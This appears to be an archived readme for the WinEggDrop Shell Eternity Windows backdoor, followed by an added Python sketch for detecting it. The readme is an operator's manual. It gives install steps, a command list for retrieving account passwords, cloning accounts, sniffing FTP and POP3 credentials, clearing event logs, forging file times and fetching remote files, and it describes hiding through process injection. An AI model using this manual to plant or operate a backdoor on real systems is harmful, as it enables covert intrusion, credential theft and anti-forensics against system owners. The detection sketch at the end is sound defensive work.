WinEggDrop Shell Eternity

Released 20 years, 10 months ago. November 2003

Copyright © MegaSecurity

By WinEggDrop


Information
From: China
Author: WinEggDrop
Family: WinEggDrop Shell
Category: Remote Access
Version: WinEggDrop Shell Eternity
Release date: Nov 2003 (20 years, 10 months ago)

Author Information / Description
WinEggDrop Shell Eternity Version

Backdoor Class: A telnetd backdoor(only works on NT systems)

Advantages(compared to backdoors of the same class)
1.Competitively small.Even though the server is nearly 80k after compression,it's still "small" 
  compared to its features and to similar backdoors
2.Many many features(some are unique)
A.Process Management-->view and kill processes(able to kill process by PID or ProcessName)
B.Registry Management(delete,set,add,view Key or keyname)
C.Service management(stop,start,enum,config and delete service)
D.TCP/IP Process to Port Mapper(similar to fport.exe)
E.Reboot,shutdown,poweroff and logoff
F.Sniffing(able to sniff ftp or pop3 password)
G.install terminal service on win 2k server system
H.Multi-thread port redirector(able to specify connection IP Range)
I.Multi-thread HTTPD(able to specify connection IP Range)
J.Sock5 Proxy(Two different auth methods,able to specify connection IP Range)
K.Clone system accounts,and check Cloned accounts
L.Findpassword(able to view all logon account's password on NT 4.0 or Win 2K,even cloned accounts)
M.TCP/IP Filtering
N.FTP basic client with unique features(resume supported,search files in ftp server,mass get,mass del,mass send and so more)
O.FTP server(use only two ports,resume supported)
P.HTTP Proxy(Full Anonymous,Support oicq,icq,msn,mirc and so more applications supporting http proxy)
Q.other features such as http downloader(resume supported),clear logs,get system info,restore common file associations
  ,enumerate system accounts and so more
3.Online help with examples(which means you can get help once you connect to the backdoor.For example,if you know there is a command named
  ftpserver but you forget the syntax,you can just enter ftpserver once you are connected to the backdoor,and the syntax and examples
  will be shown)
4.No process is shown in the task manager because the backdoor is injected into another process to run
5.Self-protection(protects the service and the injector from being deleted or modified)


Eternity Version
1.Add FTP Server
2.Add check cloned account
3.Add search file,mass get,mass send,mass del in ftp basic client
4.Add HTTP Proxy
5.Sock5 proxy,sniff,http proxy and ftp server is able to run as backdoor is loaded
6.Add feature to show the system default language
7.Modify some code on sock5 proxy
8.No new service is added as installing terminal service
9.Fix Fport code
10.Tons of mini modifications in the code

Eternity Version All Features(Commands)
1.Pslist                                   Feature:List processes
2.ListIP                                   Feature:List all IPs
3.ShowSID                                  Feature:List accounts' SID
4.Fport                                    Feature:TCP/IP Process to Port Mapper
5.Online                                   Feature:List all IPs connected to the backdoor
6.WhoIsShell                               Feature:List the IP which has got the shell
7.ShowName                                 Feature:List account by registry
8.Reboot                                   Feature:Reboot
9.ShutDown                                 Feature:ShutDown
10.Logoff                                  Feature:Logoff
11.PowerOff                                Feature:Poweroff
12.Shell                                   Feature:Get a shell
13.Stopbackdoor                            Feature:Stop The BackDoor,but you are unable to delete the backdoor's dll file
14.pskill                                  Feature:Kill process
15.Never                                   Feature:Set an account's logon time to zero
16.DirFile                                 Feature:List all files in current directory
17.DelFile                                 Feature:Delete a file
18.Execute                                 Feature:Execute a program
19.Http://IP/FileName                      Feature:Download file
20.Installterm                             Feature:Install terminal service
21.Clone                                   Feature:Clone an account
22.Send                                    Feature:Send message to the buddies who also connect to the backdoor
23.Exit                                    Feature:Quit the backdoor
24.OffShell                                Feature:Kick the one who has got the shell
25.Help                                    Feature:Show help
26.Disconnect                              Feature:Disconnect other connector
27.StopService                             Feature:Stop a service
28.StartService                            Feature:Start a service
29.DeleteService                           Feature:Delete a service
30.CleanEvent                              Feature:Clean logs
31.TerminalPort                            Feature:view or set terminal service port
32.Redirect                                Feature:Port redirector
33.ViewThreads                             Feature:View Port redirector information
34.KillThreads                             Feature:Kill one port redirector thread
35.EnableFilter                            Feature:Enable TCP/IP filtering
36.DisableFilter                           Feature:Disable TCP/IP filtering
37.FilterInfo                              Feature:View TCP/IP filtering status
38.AR                                      Feature:Restore common file association
39.GetUser                                 Feature:List all system accounts
40.ViewPath                                Feature:View current path
41.SetPath                                 Feature:Set current path
42.SID                                     Feature:View local or remote system's SID
43.ViewTimeOut                             Feature:View timeout 
44.SetTimeOut                              Feature:Set timeout
45.StartSniffer                            Feature:Start sniffing
46.StopSniffer                             Feature:Stop sniffing
47.ViewSniffer                             Feature:View sniffing status
48.Sysinfo                                 Feature:View system information
49.ViewService                             Feature:Query a service's information
50.ConfigService                           Feature:Config a service start type
51.ViewKey                                 Feature:View run and runservices startup keys in registry
52.DelKey                                  Feature:Delete a key from run and runservices in registry
53.EnumService                             Feature:Enumerate all services information matching the start type as auto
54.RegEdit                                 Feature:Enter registry management mode
55.Findpassword                            Feature:Retrieve all logon account's password
56.ExitShell                               Feature:Return from shell mode to pre-shell mode
57.StartProxy                              Feature:Start sock5 proxy
58.StopProxy                               Feature:Stop sock5 proxy
59.ViewProxyInfo                           Feature:View sock5 proxy information
60.HTTPServer                              Feature:start httpd 
61.KillHttpServer                          Feature:Kill one of httpd thread
62.ViewHTTPInfo                            Feature:View httpd information
63.Filter                                  Feature:Enter TCP/IP filtering mode
64.FTP                                     Feature:Enter FTP client mode
65.ViewFTPInfo                             Feature:View FTP client thread information
66.FTPServer                               Feature:Start ftp server
67.DeleteFTPSetting                        Feature:Delete ftp server settings
68.DeleteProxySetting                      Feature:Delete sock5 proxy settings
69.DeleteSnifferSetting                    Feature:Delete sniffing settings
70.FileTime                                Feature:Modify file time
71.KillFTPD                                Feature:Kill a connection from ftp server
72.CheckClone                              Feature:Check cloned accounts
73.StartHTTPProxy                          Feature:Start HTTP Proxy
74.ViewHTTPProxyInfo                       Feature:View HTTP Proxy Info
75.StopHTTPProxy                           Feature:Stop HTTP Proxy
76.DeleteHTTPProxySetting                  Feature:Delete HTTP Proxy Settings
77.Shield                                  Feature:Start The Backdoor's self-protection
78.UnShield                                Feature:Stop The Backdoor's self-protection
79.ViewFile                                Feature:View Ascii File Content

How to run the backdoor
1.configure injectt.exe
2.upload injectt.exe and TBack.DLL to winnt\system32
3.run "injectt.exe -run" to install the backdoor as service and start the backdoor


The commands below are used when you have already connected to the backdoor,passed the authorization 
and are in pre-shell mode(when you see [Melody],you are in pre-shell mode)
Eternity Version all Commands' syntax
1.Pslist                                   Feature:List processes
Example:pslist

2.ListIP                                   Feature:List all IPs
Example:ListIP

3.ShowSID                                  Feature:List accounts' SID
Example:ShowSID

4.ShowName                                 Feature:List account by registry
Example:ShowName

5.Fport                                    Feature:TCP/IP Process to Port Mapper
Example:Fport
Notice: A system running hxdef V0.84 with this backdoor's port hidden will affect this feature.Thus,you'd better use
mport or fport to replace this feature.Since the side effect of hxdef causes this problem,it's not a bug of
the backdoor at all.Fortunately,the failure of this feature won't crash the backdoor.

6.Online                                   Feature:List all IPs connected to the backdoor
Example:Online

7.WhoIsShell                               Feature:List the IP which has got the shell
Example:WhoIsShell

8.Reboot                                   Feature:Reboot
Example:Reboot

9.ShutDown                                 Feature:ShutDown
Example:ShutDown

10.Logoff                                  Feature:Logoff
Example:Logoff

11.PowerOff                                Feature:Poweroff
Example:PowerOff

12.Shell                                   Feature:Get a shell
Example:Shell

13.Stopbackdoor                            Feature:Stop The BackDoor
Example:Stopbackdoor

14.Help                                    Feature:Show help
Example:Help                         

15.Exit                                    Feature:Quit the backdoor
Example:Exit

16.pskill PID or ProcessName               Feature:Kill process
Example:pskill 1234
Example:pskill notepad

17.Never Account                           Feature:Set an account's logon time to zero
Example:Never Guest
Example:Never Administrator

18.DirFile FileName                        Feature:List all files in current directory
Example:DirFile *.exe

19.DelFile FileName                        Feature:Delete a file
Example: DelFile a.txt

20.Execute ProgramToRun                    Feature:Execute a program
Example:Execute abc.exe
Example:Execute net.exe user test test

21.Http://IP/FileName SaveFileName         Feature:Download file
Example:http://11.11.11.11/a.exe a.exe
Example:http://www.mysite.com/a.exe a.exe
Example: http://www.mysite.com:81/a.exe a.exe

22.Installterm Port                        Feature:Install terminal service
Example:Installterm 3345            

23.Clone Account AccountToClone Password   Feature:Clone an account
Example:Clone Admin Guest test

24.Send All Message                        Feature:Send message to the buddies who also connect to the backdoor
Example:Send all Hello

25.OffShell                                Feature:Kick the one who has got the shell
Example:OffShell

26.Disconnect                              Feature:Disconnect other connector
Example:Disconnect ThreadNumber            ->Kick someone
Example:Disconnect All                     ->Kick all but you

27.StopService                             Feature:Stop a service
Usage:StopService ServiceName
Example:StopService w3svc                
Example:StopService windows service

28.StartService                            Feature:Start a service
Usage:StartService ServiceName
Example:StartService w3svc
Example:StartService windows service

29.DeleteService                           Feature:Delete a service
Usage:DeleteService ServiceName
Example:DeleteService Windows Service
Example:DeleteService test

30.CleanEvent                              Feature:Clean logs
Example:CleanEvent
Remove Application,Security and System log

31.TerminalPort                            Feature:view terminal service port
Example:TerminalPort          

31A.TerminalPort                            Feature:set terminal service port
Example:TerminalPort Port

32.Redirect                                Feature:Port redirector
Usage:Redirect SourcePort RemoteHost RemotePort [AllowedIP]
Example:Redirect 2222 12.12.12.12 3333 
Example:Redirect 2222 www.abc.com 3333 12.12.*.*

33.ViewThreads                             Feature:View Port redirector information
Example:ViewThreads                   

34.KillThreads                             Feature:Kill one port redirector thread
Example:KillThreads ThreadNumber

35.EnableFilter                            Feature:Enable TCP/IP filtering
Example:EnableFilter

36.DisableFilter                           Feature:Disable TCP/IP filtering
Example:DisableFilter

37.FilterInfo                              Feature:View TCP/IP filtering status
Example:FilterInfo

38.AR                                      Feature:Restore common file association
Example:AR

39.GetUser                                 Feature:List all system accounts
Example:GetUser

40.ViewPath                                Feature:View current path
Example:ViewPath

41.SetPath                                 Feature:Set current path
Example:SetPath Directory

42.SID                                     Feature:View local or remote system's SID
Usage:SID Local|IP
Example:SID Local                          view Local system SID
Example:SID 12.12.12.12                    View Remote system SID

43.ViewTimeOut                             Feature:View timeout 
Example:ViewTimeOut

44.SetTimeOut                              Feature:Set timeout
Example:SetTimeOut Time(in second)

45.StartSniffer                            Feature:Start sniffing
Usage:StartSniffer NIC
Example:StartSniffer 0
Note:ListIP feature can view all the NIC

46.StopSniffer                             Feature:Stop sniffing
Example:StopSniffer

47.ViewSniffer                             Feature:View sniffing status
Example:ViewSniffer

48.Sysinfo                                 Feature:View system information
Example:Sysinfo

49.ViewService                             Feature:Query a service's information
Usage:ViewService ServiceName
Example:ViewService Norton Antivirus Server

50.ConfigService                           Feature:Config a service start type
Usage:ConfigService StartType ServiceName
Example:ConfigService Auto W3svc              -->Set service start type to auto
Example:ConfigService Demand w3svc            -->Set service start type to manual
Example:ConfigService Disable w3svc           -->Set service start type to disable

51.ViewKey                                 Feature:View run and runservices startup keys in registry
Example:ViewKey

52.DelKey                                  Feature:Delete a key from run and runservices in registry
Usage:DelKey KeyName
Example: DelKey radmm
Example: DelKey Tk BellExe

53.EnumService                             Feature:Enumerate all services information matching the start type as auto
Example:EnumService

54.RegEdit                                 Feature:Enter registry management mode
Example:RegEdit
When you enter the regedit mode,you can use any of the commands below:

DirValue                                   Feature:List all current key's value

DirKey                                     Feature:List all current keys

CD..                                       Feature:One level back

Root                                       Feature:Return to the root(hklm)

Exit                                       Feature:Quit regedit mode

Help                                       Feature:Show help

CD KeyName                                 Feature:Switch Keyname

DelValue ValueName                         Feature:Delete a value

DelKey KeyName                             Feature:Delete a Key

Set Type ValueName Value                   Feature:Add a value
Example: set REG_SZ "Test Value" hook.exe
Type: REG_SZ,REG_DWORD,REG_MUL_SZ,REG_EXPAND_SZ

SwitchRoot RootName                        Feature:Switch The Registry Root Key
The Registry has five branches,HKEY_CLASSES_ROOT(HKCR),HKEY_CURRENT_USER(HKCU),HKEY_LOCAL_MACHINE(HKLM),
HKEY_USERS(HKU) and HKEY_CURRENT_CONFIG(HKCC).The RootName is one of HKCR,HKCU,HKLM,HKU or HKCC.The most 
common branch is the HKLM branch.When you enter the registry management mode,the default branch is set to 
HKLM,so if you want to view or modify registry values other than HKLM branch,you need to use this command
to jump to other branch before processing any operations
Example:SwitchRoot HKCU       --> Jump to HKEY_CURRENT_USER branch,any operations will base on this branch

55.Findpassword                            Feature:Retrieve all logon account's password
Example:Findpassword

56.ExitShell                               Feature:Return from shell mode to pre-shell mode
Example:ExitShell

57.StartProxy                              Feature:Start sock5 proxy
Usage: StartProxy [UserName] [Password] Port AllowedIP
A.[UserName] And [Password] are optional,if they are omitted,then no authorization

Example: StartProxy 12345 All               -->Proxy port is 12345,no authorization and allow all IP to connect
Example: StartProxy Guest test 12345 All    -->Proxy port is 12345,need authorization,and allow all IP to connect
Example: StartProxy 12345 211.11.*.*        -->Proxy port is 12345,no authorization,and IP beginning with 211.11 can connect 
Example: StartProxy Abc abc 12345 12.12.*.* -->Proxy port is 12345,need authorization,and IP beginning with 12.12 can connect

58.StopProxy                               Feature:Stop sock5 proxy
Example: StopProxy

59.ViewProxyInfo                           Feature:View sock5 proxy information
Example:ViewProxyInfo

60.HTTPServer                              Feature:start httpd 
Usage:HTTPServer RootDir Port [AllowedIP]
Note:RootDir must exist
Example: HTTPServer C:\ 82                    -->Http server port is 82,RootDir=c:\ allow all IP to connect
Example2: HTTPServer c:\test 100 12.12.12.12  -->HTTP Server Port is 100,RootDir=c:\test,allow IP 12.12.12.12 to connect
       
61.KillHttpServer                          Feature:Kill one of httpd thread
Example: KillHttpserver 1

62.ViewHTTPInfo                            Feature:View httpd information
Example:ViewHttpInfo

63.Filter                                  Feature:Enter TCP/IP filtering mode
When entering TCP/IP filtering mode,you can use any commands below:

A.Restore                                  Feature:Restore the settings
Example:Restore

B.ShowTCP                                  Feature:Show TCP protocol filtering information
Example: ShowTCP

C.ShowUDP                                  Feature:Show UDP protocol filtering information
Example: ShowUDP

D.ShowALL                                  Feature:Show TCP and UDP protocols filtering information
Example: ShowALL

E.ListIP                                   Feature: List all IP and NIC
Example: ListIP

F.EnableFilter                             Feature:Enable TCP/IP filtering
Example: EnableFilter

G.DisableFilter                            Feature:Disable TCP/IP filtering
Example: DisableFilter

H.Exit                                     Feature:Quit TCP/IP filtering mode
Example: Exit

I.SetTTL                                   Feature: Set system TTL value
Usage: SetTTL Number(The number is between 0 and 255)
Example: SetTTL 240

J.Set                                      Feature: Set the filtering port
Usage: Set TCP/UDP PortList ALL/NIC
Example: Set TCP 80;139;445; 0   
Example: Set TCP 12345; 0        
Example: Set TCP 80; All         
Example: Set UDP 135; 0          

K.Add                                      Feature: Add the filtering port
Usage: Add TCP/UDP PortList All/NIC
similar to set command above

64:FTP                                     Feature:Enter FTP client mode
You can use any commands below as you enter FTP client mode

A.Dir [FileName]                           Feature: Display ftp current directory file
  Example:Dir
  Example:Dir *.exe

B.CD..                                     Feature: One directory up
  Example:CD..

C.CD Directory                             Feature: Switch Directory
  Example: CD Winnt

D.Root                                     Feature: Return to root Directory
  Example: Root

E.Exit                                     Feature: Quit FTP client mode
  Example: Exit

F.Help                                     Feature: Show help
  Example: Help

G:Del FileName                             Feature: Delete File on ftp server
  Example: Del abc.exe

H:RKDir Directory                          Feature: Delete a directory on ftp server
  Example:RKDIR abc

I:MKDIR Directory                          Feature: Create a directory on ftp server
  Example:MKDIR abc

J:REN OldFileName NewFileName              Feature: Rename a file on ftp server
  Example:REN abc.exe bb.exe

K:Get FileName [NewFileName]               Feature: Download a file from ftp server
  Example:Get abc.exe trojan.exe
  Example:Get abc.exe

L:Send FileName [NewFileName]              Feature: Upload a file to ftp server
  Example: Send trojan.exe abc.exe
  Example: Send trojan.exe

M:PD                                      Feature: List current path on ftp server
  Example:PD

O:Connect FTPAddress Port User Pass        Feature: Connect to ftp server
  Example:Connect 12.12.12.12 21 test test

P:Close                                    Feature: Close current ftp session
  Example:Close

Q:DirFile [FileName]                       Feature: List current path file on local system(the system running the backdoor)
  Example:DirFile
  Example:DirFile *.exe

R:ViewPath                                 Feature: View current path on local system(the system running the backdoor)
  Example:ViewPath

S:SetPath Path                             Feature: Set current path on local system
  Example:SetPath c:\winnt

T:ViewFTPInfo                              Feature: View ftp thread information
  Example:ViewFTPInfo

U:KillThread                               Feature: Kill a ftp thread 
  Example:KillThread 1

V.ResetFTP                                 Feature: Kill all active ftp thread
  Example:ResetFTP

W.FTPCommand                               Feature: Send ftp command
  Example:FTPCommand TYPE I
  Example:FTPCommand PASV


AA.MassGet                                 Feature: Mass get files from ftp server
   Example:MassGet *.rm

BB.MassSend                                Feature: Mass send files to ftp server
   Example:MassSend *.exe

CC.MassDel                                 Feature: Mass delete files on ftp server
   Example:MassDel *.exe

DD.FindFile                                Feature: Search files on ftp server
   Example:FindFile *.rm



65.ViewFTPInfo                             Feature:View FTP client thread information
Example:ViewFTPInfo


66.FTPServer                               Feature:Start ftp server
Usage:FTPServer ControlPort BindPort User Pass RootDir AllowedIP [Access]

Argument meanings:
1.ControlPort -->The listening port of the ftpd
2.BindPort    -->The data connection port used in pasv mode(the port is only used for Pasv connections).
                 If this port is 0,then the system will automatically allocate a port for it.
3.User        -->User name for logging in to the ftpd
4.Pass        -->Password for logging in to the ftpd
5.RootDir     -->The default root directory
6.AllowedIP   -->The IP allowed to connect to the ftpd
7.Access      -->Access String

Access String:
R represents Read Access(download access)
W represents Write Access(upload,rename,move)
L represents List Access(list file)
C represents Create Access(Create Directory on the ftpd)
D represents Delete Access(Delete File/Directory on the ftpd)
U represents Unlock Access(Unlock the user from the root directory,the user can 
                           browse all the files in all hard disks)

Access String is a combination of the above six accesses.If the access
argument is omitted,the user will gain all the accesses

Examples:
1.ftpserver 21 0 test test c:\win98 all RWLCD
Create a ftpd on port 21,the data connection port is random,user name and password are 
test,the root directory is c:\win98,allows all IP to connect this ftpd.The connected 
user will have Read,Write,List,Create,Delete Access.

2.ftpserver 21 9 test test c:\ 12.12.*.*
Create a ftpd on port 21,the data connection port is random,user name and password are
test,the root directory is c:\,allowed all IP beginning with 12.12 to connect.The connected
user will have all access(Read,Write,List,Create,Delete,Unlock Access)

3.ftpserver 21 55555 test test c:\win98 all
Create a ftpd on port 21,the data connection port is 55555,user name and password are 
test,the root directory is c:\win98,allows all IP to connect this ftpd.The connected 
user will have all access(Read,Write,List,Create,Delete,Unlock Access).

4.ftpserver 21 55555 test test c:\win98 all LRU
Create a ftpd on port 21,the data connection port is 55555,user name and password are 
test,the root directory is c:\win98,allows all IP to connect this ftpd.The connected 
user will have Read,List And Unlock Access

5.ftpserver 21 55555 test test c:\win98 all LRW
Create a ftpd on port 21,the data connection port is 55555,user name and password are 
test,the root directory is c:\win98,allows all IP to connect this ftpd.The connected 
user will have Read,List And Write Access

6.ftpserver 21 55555 test test c:\win98 all LR
Create a ftpd on port 21,the data connection port is 55555,user name and password are 
test,the root directory is c:\win98,allows all IP to connect this ftpd.The connected 
user will have Read and List access.

7.ftpserver 21 0 test test c:\win98 all LR 
Create a ftpd on port 21,the data connection port is randomly allocated by the system,
user name and password are test,the root directory is c:\win98,allows all IP to connect 
this ftpd.The connected user will have Read and List access.

Notes: The Unlock access is the most dangerous access since the logged-in user can browse all the
       disks(floppy disk,hard disk,cd-rom,zip disk,etc).If unnecessary,don't allow this access.


67.DeleteFTPSetting                        Feature:Delete ftp server settings
Example:DeleteFTPSetting

68.DeleteProxySetting                      Feature:Delete sock5 proxy settings
Example:DeleteProxySetting 

69.DeleteSnifferSetting                    Feature:Delete sniffing settings
Example:DeleteSnifferSetting  

70.FileTime                                Feature:Modify file time
Usage:FileTime SourceFileName DestFileName
Example:FileTime Write.exe abc.exe        

71.KillFTPD                                Feature:Kill a connection from ftp server
Usage:KillFTPD FTPDSessionNumber
Example:KillFTPD 1
Note:FTPDSessionNumber can be retrieved from the command "viewftpserverinfo"

72.CheckClone                              Feature:Check cloned accounts
Example:CheckClone

73.StartHTTPProxy                          Feature:Start HTTP Proxy
Usage:StartHTTPProxy Port [AllowedIP]
Example:StartHTTPProxy 8090
Example:StartHTTPProxy 8090 12.12.*.*

74.ViewHTTPProxyInfo                       Feature:View HTTP Proxy Info
Example:ViewHTTPProxyInfo

75.StopHTTPProxy                           Feature:Stop HTTP Proxy
Example:StopHTTPProxy

76.DeleteHTTPProxySetting                  Feature:Delete HTTP Proxy Settings
Example:DeleteHTTPProxySetting

77.Shield                                  Feature:Start The Backdoor's Self-protection
Example:Shield

78.UnShield                                Feature:Stop The Backdoor's Self-protection
Example:UnShield

79.ViewFile                                Feature:View Ascii File Content
Example:ViewFile FileName

More detail about TCP/IP filtering's two main commands(Set and Add)
1.Set and Add can both set a list of filtering ports for a specified protocol or all protocols,
  and the syntax of both commands is the same.The only difference is that the set command will overwrite 
  the original settings,but the add command will only append the new settings to the original 
  settings.Whichever command is used,the TCP/IP filtering status must be set to enabled,
  or the command will fail
2.The list of filtering ports must follow a special format:every port must be separated by a comma.
3.The settings will take effect after reboot
4.If the system is running a commercial ftp server such as serv-u or other kinds,don't use 
  the TCP/IP filtering feature,or the ftp server will reject the pasv mode connection.

More detail about some features:
1.ExitShell
  The command will be used as the user is already in the shell mode,and the command will
  switch the user back to pre-shell mode.The command provides a convenient way to switch
  between pre-shell mode and shell mode.

2.Cmd Redirector
  The feature eases the user to run some system commands in pre-shell mode.

3.Sock5 proxy
  Sock5 proxy supports two different methods:no auth or auth.Due to the limitations of 
  intranets,applications using the UDP protocol are unlikely to be able to use the sock5 proxy unless the
  gateway of the intranet is completely full NAT.Applications using the TCP protocol will not
  be affected

4.Httpd 
  The feature can act like a basic http server,but don't expect it to support asp,cgi or other
  stuff.This feature only provides users an easy way to create a temporary http server to view or
  download files.The httpd supports resume.To view the files,enter the http://IP:port format in IE.If
  you forget to put http:// before the IP,the operation will fail.To enter unicode directories or download
  unicode files,you need to configure a setting in IE.IE->Internet option->Advanced,uncheck the "always send 
  URLs as UTF-8(requires restart)" option,then restart IE.

5.TCP/IP Filtering
  The feature provides a way to build a "firewall" on an insecure system,but you must use it properly,or 
  the system may reject all inbound connections.In particular,don't use this feature when the system is running
  a commercial ftp server. 

6.FTP client 
  This feature is indeed a FTP client since it can do more than a standard ftp client but in console
  mode and does not support port mode connection. File transfer(download or upload) can support resume if 
  the ftp server is resumable.Due to the limitation of the ftp protocol,a ftp session will not receive any commands
  while that ftp session is in file transfer status.For example,if you are downloading files from ftp.yoursite.com,
  and you want to view files on ftp.yoursite.com,you must connect to the ftp server one more time.File search
  is only tested on serv-u V4.0,slimftpd V3.14 and the backdoor's built-in ftpd.I don't guarantee it will work on
  other ftp servers.

7.FTP Server
  This is a built-in ftpd,which supports both Pasv and Port modes,supports most basic operations such as 
  delete,create,download,upload,rename,and fxp is also supported. This ftpd is only to ease the user to transfer
  data among computers,so I can't guarantee it will work very well for multi-connection(I know it will work,but I 
  don't have the condition to test it).This ftpd allows 128 connections at most,and the same IP will be restricted
  to logging in 5 times at the same time.This ftpd is also designed to support some download utilities like flashget
  and nettransport.The most advanced part of this ftpd is that it only uses two ports for pasv connection no matter how many
  connections are logged in and performing file transfer(Usually every user will use a new port to bind locally for data 
  transfer in 99% of ftpd).This design will allow this ftpd to run under some sort of firewalls or routers.As long as the 
  control port and the data port are allowed for inbound connections,users will have no problem logging in to this 
  ftpd even if it's behind a firewall or router using pasv mode connection.If you set the data port to 0,then the system will 
  allocate a port for the ftpd as data transfer is taking place.
Notes: If the box running this ftp server has no firewall,port filtering or something similar,I recommend using 0 as the
       bind port

8.Some features run as the backdoor is loaded
  Sock5 proxy,HTTP Proxy,FTPD and sniffing features are the only features that can run as the backdoor is loaded.
  Every time you use one of these features,the setting will be saved,and if the system is restarted,the backdoor
  will start the features according to the setting.For example,if you log in to the backdoor and use the command
  "startproxy test test 12345",and if the sock5 proxy is successfully created,the setting will be saved,and 
  when the system is rebooted,the backdoor will create the sock5 proxy as it's loaded.If you don't want the backdoor
  to start the feature,you can just simply use the corresponding command to delete the setting.

Others:
1.Thanks to the coder of findpassword.I have no idea who coded it,but the findpassword feature in my backdoor is 
  based on his/her code.
2.I coded clone account and install terminal service features based on some others' research(unknown researchers,so I don't 
  know who should take this credit)
3.Fport feature is based on many people's source code,and I did modify or re-write it three times.It's pretty stable in this
  version.Thanks to those who released the source code.

WinEggDrop
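
Added example for defenders (not part of the original readme and not the backdoor author's code): the install steps under "How to run the backdoor" and the [Melody] pre-shell prompt give three host and network artifacts, and this sketch correlates them per host over constructed telemetry. The event schema, the host names, the \windows\system32 variant and the assumption that the prompt appears in cleartext in outbound traffic are all hypothetical.

```python
"""Triage endpoint/network events for the artifacts named in this readme."""
import ntpath
from collections import defaultdict

# Names taken from the readme's install steps and prompt description.
INJECTOR = "injectt.exe"
PAYLOAD_DLL = "tback.dll"
PROMPT = b"[Melody]"
# The readme names winnt\system32; windows\system32 is an added assumption.
SYSTEM_DIRS = ("\\winnt\\system32", "\\windows\\system32")


def _norm(path):
    # Windows paths are case-insensitive and accept either slash;
    # normpath also collapses "..\" segments used to dodge naive matching.
    return ntpath.normpath(path.replace("/", "\\")).lower()


def _in_system_dir(path):
    _, tail = ntpath.splitdrive(ntpath.dirname(_norm(path)))
    return tail in SYSTEM_DIRS


def signals_for(event):
    """Return the set of signal names one event contributes."""
    found = set()
    kind = event.get("type")
    if kind == "process_create":
        image = ntpath.basename(_norm(event.get("image", "")))
        args = event.get("command_line", "").lower().split()
        if image == INJECTOR:
            # "-run" is the install-as-service switch given in the readme.
            found.add("injector_run" if "-run" in args else "injector_exec")
    elif kind == "file_create":
        path = event.get("path", "")
        name = ntpath.basename(_norm(path))
        if name in (INJECTOR, PAYLOAD_DLL) and _in_system_dir(path):
            found.add("dropped:" + name)
    elif kind == "net_payload":
        # The prompt is shown to the connected client, so it leaves the host.
        if event.get("direction") == "outbound" and PROMPT in event.get("data", b""):
            found.add("prompt_seen")
    return found


def triage(events):
    """Map host -> (verdict, sorted signals); hosts with no signal are omitted.

    File names are trivially renamed, so one signal only asks for review;
    two or more independent signals on the same host are reported as likely.
    """
    per_host = defaultdict(set)
    for ev in events:
        per_host[ev["host"]] |= signals_for(ev)
    report = {}
    for host, sigs in per_host.items():
        if sigs:
            verdict = "likely" if len(sigs) >= 2 else "review"
            report[host] = (verdict, sorted(sigs))
    return report


# Constructed sample telemetry (not real logs).
SAMPLE_EVENTS = [
    {"host": "ws-01", "type": "file_create", "path": r"C:\WINNT\system32\injectt.exe"},
    {"host": "ws-01", "type": "file_create", "path": "c:/winnt/System32/TBack.DLL"},
    {"host": "ws-01", "type": "process_create",
     "image": r"C:\WINNT\system32\injectt.exe", "command_line": "injectt.exe -run"},
    {"host": "ws-01", "type": "net_payload", "direction": "outbound",
     "data": b"\r\n[Melody]"},
    # Same DLL name outside the system directory: not counted.
    {"host": "ws-02", "type": "file_create", "path": r"D:\samples\quarantine\TBack.DLL"},
    {"host": "ws-02", "type": "process_create",
     "image": r"C:\WINNT\notepad.exe", "command_line": "notepad.exe a.txt"},
    # Prompt string alone: worth a look, not conclusive.
    {"host": "ws-03", "type": "net_payload", "direction": "outbound",
     "data": b"[Melody]"},
    # Inbound data that merely contains the string: ignored.
    {"host": "ws-04", "type": "net_payload", "direction": "inbound",
     "data": b"GET /?q=[Melody] HTTP/1.0"},
]

if __name__ == "__main__":
    for host, (verdict, sigs) in sorted(triage(SAMPLE_EVENTS).items()):
        print(host, verdict, ", ".join(sigs))
```

Because the readme says the backdoor runs injected into another process, a clean process list does not clear a host; the file and service artifacts are the more durable signals.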
